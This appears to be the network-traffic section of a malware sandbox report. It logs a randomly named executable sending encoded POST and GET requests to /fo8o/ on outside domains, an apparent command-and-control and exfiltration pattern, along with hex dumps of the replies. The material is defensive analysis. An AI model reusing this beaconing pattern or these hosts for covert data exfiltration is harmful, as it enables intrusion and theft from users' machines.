                                                    Data Raw: 5a 6c 34 68 31 3d 50 49 6e 49 63 4d 6d 76 50 55 67 68 67 48 69 34 62 39 4c 35 67 38 69 4d 58 69 59 69 62 44 58 33 48 35 61 4a 33 36 74 4b 48 71 68 38 6b 55 67 54 78 37 5a 79 35 4f 61 57 43 4f 4f 78 6d 69 69 45 51 52 69 39 74 52 4c 49 73 2f 68 39 72 4e 4e 4b 61 6d 70 45 51 30 45 4f 41 33 31 65 4d 77 64 4e 6e 39 69 2b 64 66 52 2b 44 74 73 4d 41 70 76 2b 39 37 68 72 46 36 4b 70 2b 47 72 43 6e 6d 63 47 39 61 4d 54 68 38 4d 72 70 33 41 52 33 2f 71 61 65 46 48 61 6e 43 6d 47 37 49 73 6c 76 48 6b 58 36 41 4b 4d 67 61 67 64 75 2b 52 72 6a 66 69 32 69 76 46 4c 72 62 43 30 59 2f 69 73 7a 73 35 62 7a 36 57 36 39 48 4a 4a 2f 32 37 68 68 67 70 66 55 4b 6c 50 32 74 63 3d
                                                    Data Ascii: Zl4h1=PInIcMmvPUghgHi4b9L5g8iMXiYibDX3H5aJ36tKHqh8kUgTx7Zy5OaWCOOxmiiEQRi9tRLIs/h9rNNKampEQ0EOA31eMwdNn9i+dfR+DtsMApv+97hrF6Kp+GrCnmcG9aMTh8Mrp3AR3/qaeFHanCmG7IslvHkX6AKMgagdu+Rrjfi2ivFLrbC0Y/iszs5bz6W69HJJ/27hhgpfUKlP2tc=
                                                    Jun 9, 2024 18:02:52.845716953 CEST1037INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sun, 09 Jun 2024 16:02:54 GMT
                                                    Content-Type: text/html;charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    X-Powered-By: PHP/5.4.41
                                                    Content-Encoding: gzip
                                                    Data Raw: 33 31 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 4d 6f dc 36 10 bd fb 57 4c 74 d9 5d a0 2b 6a 5d 27 4e b4 5a 1d 1c 3b 48 00 d7 35 e2 0d 90 a0 28 0a 8a 9a 5d d1 91 48 86 a4 d6 5e 27 01 72 29 72 e8 a1 e8 a1 01 82 a4 a7 a2 40 8f 69 4f 05 0a f7 d7 74 dd f6 5f 74 24 6d d1 4d 3f 0e a2 44 72 de e3 cc e3 1b 25 d7 f6 3f be 3d 7d 74 7c 00 77 a7 1f 1d c2 f1 83 bd c3 7b b7 21 18 32 76 ef 60 7a 87 b1 fd e9 7e b7 b3 1d 46 8c 1d 1c 05 e9 56 52 f8 aa 6c 5e c8 f3 34 f1 d2 97 98 fe f1 f2 ab ab 1f 5f af be ff 81 1b f3 eb 4f 5f fc 7e 79 79 eb fa 6e 34 bc 7a fb e2 ea d5 bb d5 db 77 ab 6f 5e 3c fb ed f5 cf ab cb af 57 9f 7f b7 fa f2 db 84 75 b8 ad c4 09 2b 8d 07 67 c5 24 60 a7 4f 6a b4 cb b0 92 2a 3c 75 01 a4 09 eb b6 e9 a3 3d 6d 2b c9 74 be 84 6c 2e 74 a9 ed 24 38 2b a4 c7 36 a5 51 ba 13 7d 08 77 b4 cd 64 9e a3 a2 f8 11 2d 9b f4 91 ae 21 d7 aa e7 a1 e0 0b 04 83 b6 92 ce 49 ad c0 6b e0 42 a0 73 e0 0b 84 07 f7 0f a1 59 2c a4 03 87 76 81 36 84 13 6d ed 12 66 da b6 11 52 09 ad 16 a8 24 2a 81 61 92 59 96 6e 1d 97 c8 1d 82 [TRUNCATED]
                                                    Data Ascii: 31buTMo6WLt]+j]'NZ;H5(]H^'r)r@iOt_t$mM?Dr%?=}t|w{!2v`z~FVRl^4_O_~yyn4zwo^<Wu+g$`Oj*<u=m+tl.t$8+6Q}wd-!IkBsY,v6mfR$*aYnE19Wy)[L>jNDYqNvkicXRtZf3IFLl=g]:d#XU0;h{8ZyTyJKs\aBt#nc8,q<'9QdrbWi8#{EkQP*<<e%03|c*n6HF%kJ4<]pLAHQc&5CHnqoIXp2^q<LHClREM6*R*]A??m/33.6%x+;hp89RQ{=~f>7Ano_0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    43192.168.2.1149755104.206.198.212806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:02:54.660970926 CEST1812OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.shenzhoucui.com
                                                    Origin: http://www.shenzhoucui.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1234
                                                    Referer: http://www.shenzhoucui.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 50 49 6e 49 63 4d 6d 76 50 55 67 68 67 48 69 34 62 39 4c 35 67 38 69 4d 58 69 59 69 62 44 58 33 48 35 61 4a 33 36 74 4b 48 71 70 38 6b 6d 34 54 7a 61 5a 79 34 4f 61 57 63 65 4f 30 6d 69 69 56 51 52 36 78 74 52 58 59 73 35 39 39 6b 50 46 4b 63 54 46 45 48 45 45 4f 59 48 31 66 43 51 63 50 6e 39 79 36 64 65 68 2b 44 74 73 4d 41 6f 2f 2b 37 75 56 72 44 36 4b 71 35 47 72 4f 6a 6d 63 2b 39 61 46 6b 68 38 49 37 6f 45 49 52 32 66 61 61 64 32 2f 61 6d 69 6d 59 38 49 73 74 76 48 34 59 36 41 57 75 67 61 6b 7a 75 35 64 72 68 35 66 76 77 66 4a 7a 2b 70 57 37 46 50 66 4c 79 66 4d 64 36 35 62 66 35 46 56 4e 69 51 69 74 6d 51 38 53 42 34 55 49 6c 39 37 31 42 46 62 59 79 46 6d 31 2b 47 64 50 69 79 31 34 63 77 6c 77 32 70 4e 5a 32 35 2f 47 49 4b 33 49 36 68 72 58 50 31 43 4e 71 45 4a 48 64 35 52 64 57 63 37 68 30 4b 75 37 6e 64 41 42 61 50 39 5a 45 55 69 66 4f 6f 43 51 78 54 55 56 6e 2b 78 77 76 41 62 73 78 4f 32 47 2f 6e 34 67 66 57 48 58 37 32 4c 54 31 36 55 56 6f 69 7a 30 58 73 77 34 68 64 67 4e [TRUNCATED]
                                                    Data Ascii: Zl4h1=PInIcMmvPUghgHi4b9L5g8iMXiYibDX3H5aJ36tKHqp8km4TzaZy4OaWceO0miiVQR6xtRXYs599kPFKcTFEHEEOYH1fCQcPn9y6deh+DtsMAo/+7uVrD6Kq5GrOjmc+9aFkh8I7oEIR2faad2/amimY8IstvH4Y6AWugakzu5drh5fvwfJz+pW7FPfLyfMd65bf5FVNiQitmQ8SB4UIl971BFbYyFm1+GdPiy14cwlw2pNZ25/GIK3I6hrXP1CNqEJHd5RdWc7h0Ku7ndABaP9ZEUifOoCQxTUVn+xwvAbsxO2G/n4gfWHX72LT16UVoiz0Xsw4hdgNlXYqzVHDJoWa9Ul+ysVtK/o21NkPZf35pLxF6jKGBYi5tQVJV6QHDJHDr9ccSPE6YbhCMvWNhTlbh0/5ysyZltwRlLwZF7dpXDf/jhKI2wlv15bfEbV77zNuG53yfqxqhdenTb2cgEkL/8x2QqsDRdiQoiYnBk1e3bHbQ30ymviDTBxl83K3yXoIelOkjwm6v3v29lWJp24l/9kLUiXf0HnW9PfVfRKviqsKyiO7BBRFHBgJVZuO28Zk7pHtYByNJgWhCROLRLyiuu8JuXPQi25M3YuAmDWZkvYz/JjzfIiule7MDvxNys5aISraIhTAIsp6cE5eFNbaTqsBARF9BKAXq/3YOGlvBieWFWGWVB8umR3YoRa2kcFdPJQBllckVa8/bcTVClfTSa1YW2r04mZXROZ2E3NUlgidokbF6C3PgFmbLYfZzoWjcDYHeH+cLMipN16bGwfTp8XQ8AEzIabveMMhvyC19aNhe4xIEzjqg9zpsX8mKqgIP+CxXswOHEcGT1MuZLYo1WMoURvEkTPsToOtLUUoL9nNZ35RsNeosZKOUOd0gMhTgPlyjVNLwN/0L83OMjW6ODqHWQ9xCEmAKQ2Drttv2iZmiC/Z6+dlsBJ46Vk6PynpIBuoJxox8qHpU0VmBegkdeEl8YucefcBuSaYV5Sl96 [TRUNCATED]
                                                    Jun 9, 2024 18:02:55.405416012 CEST1037INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sun, 09 Jun 2024 16:02:56 GMT
                                                    Content-Type: text/html;charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    X-Powered-By: PHP/5.4.41
                                                    Content-Encoding: gzip
                                                    Data Raw: 33 31 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 4d 6f dc 36 10 bd fb 57 4c 74 d9 5d a0 2b 6a 5d 27 4e b4 5a 1d 1c 3b 48 00 d7 35 e2 0d 90 a0 28 0a 8a 9a 5d d1 91 48 86 a4 d6 5e 27 01 72 29 72 e8 a1 e8 a1 01 82 a4 a7 a2 40 8f 69 4f 05 0a f7 d7 74 dd f6 5f 74 24 6d d1 4d 3f 0e a2 44 72 de e3 cc e3 1b 25 d7 f6 3f be 3d 7d 74 7c 00 77 a7 1f 1d c2 f1 83 bd c3 7b b7 21 18 32 76 ef 60 7a 87 b1 fd e9 7e b7 b3 1d 46 8c 1d 1c 05 e9 56 52 f8 aa 6c 5e c8 f3 34 f1 d2 97 98 fe f1 f2 ab ab 1f 5f af be ff 81 1b f3 eb 4f 5f fc 7e 79 79 eb fa 6e 34 bc 7a fb e2 ea d5 bb d5 db 77 ab 6f 5e 3c fb ed f5 cf ab cb af 57 9f 7f b7 fa f2 db 84 75 b8 ad c4 09 2b 8d 07 67 c5 24 60 a7 4f 6a b4 cb b0 92 2a 3c 75 01 a4 09 eb b6 e9 a3 3d 6d 2b c9 74 be 84 6c 2e 74 a9 ed 24 38 2b a4 c7 36 a5 51 ba 13 7d 08 77 b4 cd 64 9e a3 a2 f8 11 2d 9b f4 91 ae 21 d7 aa e7 a1 e0 0b 04 83 b6 92 ce 49 ad c0 6b e0 42 a0 73 e0 0b 84 07 f7 0f a1 59 2c a4 03 87 76 81 36 84 13 6d ed 12 66 da b6 11 52 09 ad 16 a8 24 2a 81 61 92 59 96 6e 1d 97 c8 1d 82 [TRUNCATED]
                                                    Data Ascii: 31buTMo6WLt]+j]'NZ;H5(]H^'r)r@iOt_t$mM?Dr%?=}t|w{!2v`z~FVRl^4_O_~yyn4zwo^<Wu+g$`Oj*<u=m+tl.t$8+6Q}wd-!IkBsY,v6mfR$*aYnE19Wy)[L>jNDYqNvkicXRtZf3IFLl=g]:d#XU0;h{8ZyTyJKs\aBt#nc8,q<'9QdrbWi8#{EkQP*<<e%03|c*n6HF%kJ4<]pLAHQc&5CHnqoIXp2^q<LHClREM6*R*]A??m/33.6%x+;hp89RQ{=~f>7Ano_0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    44192.168.2.1149756104.206.198.212806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:02:57.277683973 CEST507OUTGET /fo8o/?Zl4h1=CKPof6WmPR8MjyGgZoDlhb60KxQVVSuHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBCxUtCWRaVQIS6dSVAag1St1hJr7Wk88RO5I=&Pbw=PLVXbnG85 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Host: www.shenzhoucui.com
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Jun 9, 2024 18:02:58.219666004 CEST1236INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sun, 09 Jun 2024 16:02:59 GMT
                                                    Content-Type: text/html;charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    X-Powered-By: PHP/5.4.41
                                                    Data Raw: 35 39 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e e9 87 91 e6 b2 99 e5 a8 b1 61 70 70 e4 b8 8b e8 bd bd 39 35 37 30 2d e6 9c 80 e6 96 b0 e5 9c b0 e5 9d 80 7c e7 99 bb e5 bd 95 e5 85 a5 e5 8f a3 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 27 e9 87 91 e6 b2 99 e5 a8 b1 61 70 70 e4 b8 8b e8 bd bd 39 35 37 30 2d e6 9c 80 e6 96 b0 e5 9c b0 e5 9d 80 7c e7 99 bb e5 bd 95 e5 85 a5 e5 8f a3 27 3e e9 87 91 e6 b2 99 e5 a8 b1 61 70 70 e4 b8 8b e8 bd bd 39 35 37 30 2d e6 9c 80 e6 96 b0 e5 9c b0 e5 9d 80 7c e7 99 bb e5 bd 95 e5 85 a5 e5 8f a3 3c 2f 61 3e 3c 2f 68 31 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 [TRUNCATED]
                                                    Data Ascii: 594<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>app9570-|</title><script src="/jquery.min.js" ></script></head><body><h1><a href="/" title='app9570-|'>app9570-|</a></h1><center><h1>403 Forbidden</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>/fo8o/?Zl4h1=CKPof6WmPR8MjyGgZoDlhb60KxQVVSuHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBCxUtCWRaVQIS6dSVAag1St1hJr7Wk88RO5I=&Pbw=PLVXbnG85</td></tr><tr><td>Server:</td><td>prod-qwmh-bj7-pool202-frontend-static-01</td></tr><tr><td>Date:</td><td>2024/06/10 00:02:58</td></tr></table><hr><center>tengine</center><div style="clear:both;padding:10px;text-align:center;margin:5"><a href="/shenzhoucui.com.xml" target="_blank">XML </a> | <a href="/shenzhoucui.com.htm [TRUNCATED]
                                                    Jun 9, 2024 18:02:58.219706059 CEST410INData Raw: 3e 53 69 74 65 6d 61 70 20 e5 9c b0 e5 9b be 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 20 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72
                                                    Data Ascii: >Sitemap </a></div><script> (function(){var bp = document.createElement('script');var curProtocol = window.location.protocol.split(':')[0];if (curProtocol === 'https') {bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';}else{bp.src =


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    45192.168.2.1149757194.58.112.174806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:03:03.320683002 CEST764OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.b301.space
                                                    Origin: http://www.b301.space
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 202
                                                    Referer: http://www.b301.space/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 4e 57 66 33 62 5a 52 6f 59 45 75 4a 37 70 55 4e 41 44 38 34 4b 70 64 35 32 47 7a 54 71 76 67 75 33 31 66 65 75 62 46 52 76 45 65 4f 41 68 4a 4b 75 79 37 2b 30 31 4f 33 37 41 38 46 68 74 6e 4d 6d 46 50 4d 2f 50 67 57 47 55 78 53 31 55 38 76 46 65 6d 61 61 78 6b 73 37 6b 63 48 73 4f 78 57 62 70 49 79 4c 6a 35 38 48 72 2b 75 4e 6a 51 67 77 6b 44 6e 63 39 44 44 6e 46 73 59 75 2f 4e 47 4e 2b 50 75 56 33 4c 54 79 6e 71 66 47 38 76 42 63 31 56 5a 6b 5a 48 4c 62 66 45 30 36 48 42 56 47 65 47 75 65 49 70 55 68 69 72 39 66 67 59 6f 47 67 34 43 52 69 78 72 38 5a 46 5a 33 67 67 64 6a 41 3d 3d
                                                    Data Ascii: Zl4h1=NWf3bZRoYEuJ7pUNAD84Kpd52GzTqvgu31feubFRvEeOAhJKuy7+01O37A8FhtnMmFPM/PgWGUxS1U8vFemaaxks7kcHsOxWbpIyLj58Hr+uNjQgwkDnc9DDnFsYu/NGN+PuV3LTynqfG8vBc1VZkZHLbfE06HBVGeGueIpUhir9fgYoGg4CRixr8ZFZ3ggdjA==
                                                    Jun 9, 2024 18:03:04.231846094 CEST1236INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Sun, 09 Jun 2024 16:03:04 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Content-Encoding: gzip
                                                    Data Raw: 65 33 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b d7 11 fd ee 5f 71 cd 02 22 69 73 77 25 3b 29 6c 8b a4 e2 d8 69 bf 38 49 01 39 2d 0a c5 21 2e 97 57 e4 5a cb 5d 76 77 29 99 b1 0d 24 76 9e 88 11 23 69 80 16 41 df 45 d1 4f 05 6c d9 6a 14 3f e4 bf b0 fb 8f 7a 66 ee ee 72 49 91 b2 fc 48 1a 01 92 c8 fb 9c 3b 73 e6 cc dc 47 fd 68 c7 b7 a3 d1 40 89 5e d4 77 9b 75 fa 2b 6c 57 86 61 a3 e4 84 2d d9 91 83 c8 d9 54 25 e1 4a af db 28 05 c3 12 da 28 d9 69 d6 fb 2a 92 c2 ee c9 20 54 51 a3 f4 ce c5 5f 18 a7 50 c7 a5 9e ec ab 46 69 20 83 0d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 68 04 18 73 b2 e5 a6 a3 b6 06 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 84 21 22 27 72 55 73 6b 6b cb 6c 9f 5c 5c 32 c3 81 b4 55 dd d2 a5 75 d7 f1 36 44 a0 dc 46 29 8c 46 ae 0a 7b 4a 61 82 be ea 38 b2 51 92 ae 5b 12 bd 40 ad e7 62 b2 58 86 1c 46 be 69 87 21 06 1f f7 77 b0 80 ac f5 ba 84 44 be 67 e2 cf ca 52 49 90 e6 a0 a8 be ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 41 d4 b4 8e d5 8f ae 9d 3b 7f f6 [TRUNCATED]
                                                    Data Ascii: e30Zko_q"isw%;)li8I9-!.WZ]vw)$v#iAEOlj?zfrIH;sGh@^wu+lWa-T%J((i* TQ_PFi {(P`hs~n9MV995B[!"'rUskkl\\2Uu6DF)F{Ja8Q[@bXFi!wDgRI*A;c-[fH{c\eG4#*X.]jV:H:=TV_z#rX^CM,ORq #0Zg>\4ZNEHmQ1"Rr#v\KqqV%zgsnW#)RW0QM?w".|>w/PuAAxv&W;o(Y]rVaF%uhUVV *x/6b0}a$#fOvZkc"SCic^'}v+A3'l8Q{ai`~])Wy6,UKj3k.m&Nji)kY[=B$g/`[?l&'6.5C}RrL<x%/3G)XVQ?lJn2g2/PH5B(0K07^irS38Zp<D8oNBE5xhG3SXl*N#wxRS,}/nDo [TRUNCATED]
                                                    Jun 9, 2024 18:03:04.231864929 CEST1236INData Raw: 68 fb 74 d6 b1 f9 0b 74 ea 1a 7d f8 b0 e3 b5 5c b5 1e 19 da 9f 31 61 14 f8 5e f7 e9 46 01 f7 02 ee 36 85 ae 7f 01 bd 88 53 50 ef e3 f8 1e 70 c6 23 4c 70 eb b4 db 6a e5 84 c3 b6 36 79 2e 49 db 07 cb f5 11 19 3d 85 71 ff 8c 78 77 3f f9 0a 2e f2 38
                                                    Data Ascii: htt}\1a^F6SPp#Lpj6y.I=qxw?.8"^z7BF*[ y*[ u%at7^]9p`G5.0MN[smr'X-_V!? 3&G9_5x`j?sB| .E$3i
                                                    Jun 9, 2024 18:03:04.231878042 CEST1236INData Raw: 4a 64 b8 ff 24 b2 64 8e 03 55 e9 d8 2b f2 d4 33 85 16 27 da f3 81 98 ed b9 39 65 05 d9 51 28 a7 e0 5f 4c 5a 91 24 73 2a c0 59 70 e1 28 02 cd 91 02 83 c3 1f 81 37 3f e3 10 8f 3d 2c 83 1c f2 1c 15 f1 b7 dc 0d 60 d6 f9 05 28 bb 86 7d 71 be 71 a6 a4
                                                    Data Ascii: Jd$dU+3'9eQ(_LZ$s*Yp(7?=,`(}qq!6oc=r?;}d"~R8:zYptj,?t'Vx&+Co>pJCTp{=.=J*\Aofe.KJwd$+z(8"{F\4j*&Q@[|
                                                    Jun 9, 2024 18:03:04.231888056 CEST110INData Raw: 16 b2 55 a1 16 c7 09 9b 4e e8 07 5c c4 e3 5e 2f 1a d9 f3 b3 e0 c5 b9 b3 d3 ef ea 17 68 33 57 b2 45 21 cc ca e4 c5 5b 35 3a ae c6 e3 3d 1f 8e 85 77 39 67 64 3b f4 dd 61 a4 96 05 5d 7a 9c 31 4e e3 67 70 65 b9 24 a4 8b e7 4c e4 08 3a 41 1f 4f 4a 18
                                                    Data Ascii: UN\^/h3WE![5:=w9gd;a]z1Ngpe$L:AOJE]D.')0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    46192.168.2.1149758194.58.112.174806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:03:05.966167927 CEST784OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.b301.space
                                                    Origin: http://www.b301.space
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 222
                                                    Referer: http://www.b301.space/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 4e 57 66 33 62 5a 52 6f 59 45 75 4a 36 4e 6f 4e 4d 41 6b 34 62 35 64 34 71 32 7a 54 67 50 67 71 33 31 62 65 75 65 6f 4d 73 79 4f 4f 4f 6b 74 4b 74 33 48 2b 31 31 4f 33 6a 77 38 4d 73 4e 6e 35 6d 46 44 75 2f 4b 59 57 47 53 64 53 31 57 30 76 46 70 79 56 62 68 6b 71 69 30 63 46 69 75 78 57 62 70 49 79 4c 6a 74 57 48 71 57 75 4d 58 55 67 77 47 72 6b 56 64 44 43 7a 56 73 59 71 2f 4e 43 4e 2b 50 59 56 31 2b 45 79 6c 53 66 47 39 66 42 63 67 30 50 74 5a 48 4a 52 2f 45 6c 35 45 70 52 42 76 53 6b 57 71 4a 46 33 44 57 66 54 47 4a 79 57 44 78 56 53 78 35 70 6f 2f 6b 70 2b 52 46 55 34 48 51 73 55 43 55 62 30 44 48 52 54 4d 71 7a 7a 6b 46 32 33 2b 6b 3d
                                                    Data Ascii: Zl4h1=NWf3bZRoYEuJ6NoNMAk4b5d4q2zTgPgq31beueoMsyOOOktKt3H+11O3jw8MsNn5mFDu/KYWGSdS1W0vFpyVbhkqi0cFiuxWbpIyLjtWHqWuMXUgwGrkVdDCzVsYq/NCN+PYV1+EylSfG9fBcg0PtZHJR/El5EpRBvSkWqJF3DWfTGJyWDxVSx5po/kp+RFU4HQsUCUb0DHRTMqzzkF23+k=
                                                    Jun 9, 2024 18:03:06.869708061 CEST1236INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Sun, 09 Jun 2024 16:03:06 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Content-Encoding: gzip
                                                    Data Raw: 65 33 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b d7 11 fd ee 5f 71 cd 02 22 69 73 77 25 3b 29 6c 8b a4 e2 d8 69 bf 38 49 01 39 2d 0a c5 21 2e 97 57 e4 5a cb 5d 76 77 29 99 b1 0d 24 76 9e 88 11 23 69 80 16 41 df 45 d1 4f 05 6c d9 6a 14 3f e4 bf b0 fb 8f 7a 66 ee ee 72 49 91 b2 fc 48 1a 01 92 c8 fb 9c 3b 73 e6 cc dc 47 fd 68 c7 b7 a3 d1 40 89 5e d4 77 9b 75 fa 2b 6c 57 86 61 a3 e4 84 2d d9 91 83 c8 d9 54 25 e1 4a af db 28 05 c3 12 da 28 d9 69 d6 fb 2a 92 c2 ee c9 20 54 51 a3 f4 ce c5 5f 18 a7 50 c7 a5 9e ec ab 46 69 20 83 0d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 68 04 18 73 b2 e5 a6 a3 b6 06 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 84 21 22 27 72 55 73 6b 6b cb 6c 9f 5c 5c 32 c3 81 b4 55 dd d2 a5 75 d7 f1 36 44 a0 dc 46 29 8c 46 ae 0a 7b 4a 61 82 be ea 38 b2 51 92 ae 5b 12 bd 40 ad e7 62 b2 58 86 1c 46 be 69 87 21 06 1f f7 77 b0 80 ac f5 ba 84 44 be 67 e2 cf ca 52 49 90 e6 a0 a8 be ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 41 d4 b4 8e d5 8f ae 9d 3b 7f f6 [TRUNCATED]
                                                    Data Ascii: e30Zko_q"isw%;)li8I9-!.WZ]vw)$v#iAEOlj?zfrIH;sGh@^wu+lWa-T%J((i* TQ_PFi {(P`hs~n9MV995B[!"'rUskkl\\2Uu6DF)F{Ja8Q[@bXFi!wDgRI*A;c-[fH{c\eG4#*X.]jV:H:=TV_z#rX^CM,ORq #0Zg>\4ZNEHmQ1"Rr#v\KqqV%zgsnW#)RW0QM?w".|>w/PuAAxv&W;o(Y]rVaF%uhUVV *x/6b0}a$#fOvZkc"SCic^'}v+A3'l8Q{ai`~])Wy6,UKj3k.m&Nji)kY[=B$g/`[?l&'6.5C}RrL<x%/3G)XVQ?lJn2g2/PH5B(0K07^irS38Zp<D8oNBE5xhG3SXl*N#wxRS,}/nDo [TRUNCATED]
                                                    Jun 9, 2024 18:03:06.869774103 CEST1236INData Raw: 68 fb 74 d6 b1 f9 0b 74 ea 1a 7d f8 b0 e3 b5 5c b5 1e 19 da 9f 31 61 14 f8 5e f7 e9 46 01 f7 02 ee 36 85 ae 7f 01 bd 88 53 50 ef e3 f8 1e 70 c6 23 4c 70 eb b4 db 6a e5 84 c3 b6 36 79 2e 49 db 07 cb f5 11 19 3d 85 71 ff 8c 78 77 3f f9 0a 2e f2 38
                                                    Data Ascii: htt}\1a^F6SPp#Lpj6y.I=qxw?.8"^z7BF*[ y*[ u%at7^]9p`G5.0MN[smr'X-_V!? 3&G9_5x`j?sB| .E$3i
                                                    Jun 9, 2024 18:03:06.869813919 CEST1236INData Raw: 4a 64 b8 ff 24 b2 64 8e 03 55 e9 d8 2b f2 d4 33 85 16 27 da f3 81 98 ed b9 39 65 05 d9 51 28 a7 e0 5f 4c 5a 91 24 73 2a c0 59 70 e1 28 02 cd 91 02 83 c3 1f 81 37 3f e3 10 8f 3d 2c 83 1c f2 1c 15 f1 b7 dc 0d 60 d6 f9 05 28 bb 86 7d 71 be 71 a6 a4
